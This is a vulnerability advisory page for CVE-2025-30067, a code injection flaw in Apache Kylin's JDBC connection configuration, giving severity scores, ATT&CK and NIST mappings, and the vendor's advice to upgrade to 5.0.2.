CVE-2025-30067
Published: 27 March 2025
Summary
CVE-2025-30067 is a high-severity Code Injection (CWE-94) vulnerability in Apache Kylin. Its CVSS base score is 7.2 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Privilege Escalation (T1068); ranked at the 47.3th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 AC-6 (Least Privilege) and SI-10 (Information Input Validation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly mitigates the code injection vulnerability by requiring timely remediation through upgrading Apache Kylin to version 5.0.2 or later as recommended by the vendor.
Enforces least privilege to minimize users with system or project admin permissions required for altering JDBC configurations and executing arbitrary code.
Requires validation of information inputs such as JDBC connection configurations to prevent code injection attacks like CWE-94.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Code injection vulnerability allows authenticated admin to achieve arbitrary remote code execution on the host, directly enabling T1068 (Exploitation for Privilege Escalation from app-level admin to system code exec) and T1059 (Command and Scripting Interpreter for running the injected code).
NVD Description
Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Kylin. If an attacker gets access to Kylin's system or project admin permission, the JDBC connection configuration maybe altered to execute arbitrary code from the remote. You are fine…
more
as long as the Kylin's system and project admin access is well protected. This issue affects Apache Kylin: from 4.0.0 through 5.0.1. Users are recommended to upgrade to version 5.0.2 or above, which fixes the issue.
Deeper analysisAI
CVE-2025-30067 is an Improper Control of Generation of Code ('Code Injection') vulnerability, classified under CWE-94, affecting Apache Kylin versions from 4.0.0 through 5.0.1. The flaw allows manipulation of the JDBC connection configuration when an attacker possesses system or project admin permissions within Kylin. It carries a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H), indicating high-impact potential with network accessibility but requiring high privileges.
An attacker with Kylin's system or project admin access can exploit this vulnerability by altering the JDBC connection configuration to execute arbitrary remote code. This enables full compromise of confidentiality, integrity, and availability on the affected system, as the code injection occurs without user interaction beyond the initial privilege attainment. Proper protection of admin credentials mitigates the risk, as exploitation hinges on prior access elevation.
Apache advisories recommend upgrading to version 5.0.2 or later, which resolves the issue. Detailed announcements are available in the Apache mailing list at https://lists.apache.org/thread/6j19pt8yoqfphf1lprtrzoqkvz1gwbnc and the OSS-Security mailing list at http://www.openwall.com/lists/oss-security/2025/03/27/4.
Details
- CWE(s)